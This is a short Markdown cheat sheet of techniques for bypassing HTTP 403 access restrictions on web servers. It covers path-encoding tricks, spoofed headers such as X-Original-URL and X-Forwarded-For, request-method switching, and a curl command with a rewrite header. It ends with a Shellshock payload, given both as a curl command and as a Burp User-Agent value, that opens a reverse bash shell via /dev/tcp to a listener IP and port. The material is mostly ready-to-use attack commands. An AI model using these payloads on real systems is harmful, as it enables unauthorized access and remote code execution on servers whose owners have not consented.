34 lines
1.2 KiB
Markdown
34 lines
1.2 KiB
Markdown
|
## How to bypass 403 Errors
|
|||
|
**Technique number 1**
|
|||
|
- Appending `{%2e} or {%2f} { **/*, /./}` after the first slash
|
|||
|
- https://www.domain/DB = 403
|
|||
|
- https://www.domain/%2e/DB] =200
|
|||
|
- https://www.domain/./DB] =200
|
|||
|
|
|||
|
**Technique number 2**
|
|||
|
- Adding headers to requests module.
|
|||
|
- Content-Length: 0
|
|||
|
- X-rewrite-url
|
|||
|
- X-Original-URL
|
|||
|
- X-Custom-IP-Authorization
|
|||
|
- X-Forwarded-For
|
|||
|
|
|||
|
**Technique number 3**
|
|||
|
- Change the request method
|
|||
|
- GET → POST
|
|||
|
- GET → TRACE
|
|||
|
- GET → PUT
|
|||
|
- GET **→** OPTIONS
|
|||
|
|
|||
|
**Technique number 4**
|
|||
|
- Using Curl
|
|||
|
- curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’https://account.domain.com/'
|
|||
|
|
|||
|
**Technique number 5**
|
|||
|
- Brute force sub directory from the 403 directory
|
|||
|
- Try using (wordlist/dirb/comon.txt)
|
|||
|
- Setup Netcat lisener
|
|||
|
- Inject parameters from Curl or Burp Suite
|
|||
|
- CURL ---> curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi
|
|||
|
- Burp Suite ---> Change User-Agent: () { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1
|
|||
|
- More info ---> https://hackbotone.com/shellshock-attack-on-a-remote-web-server-d9124f4a0af3
|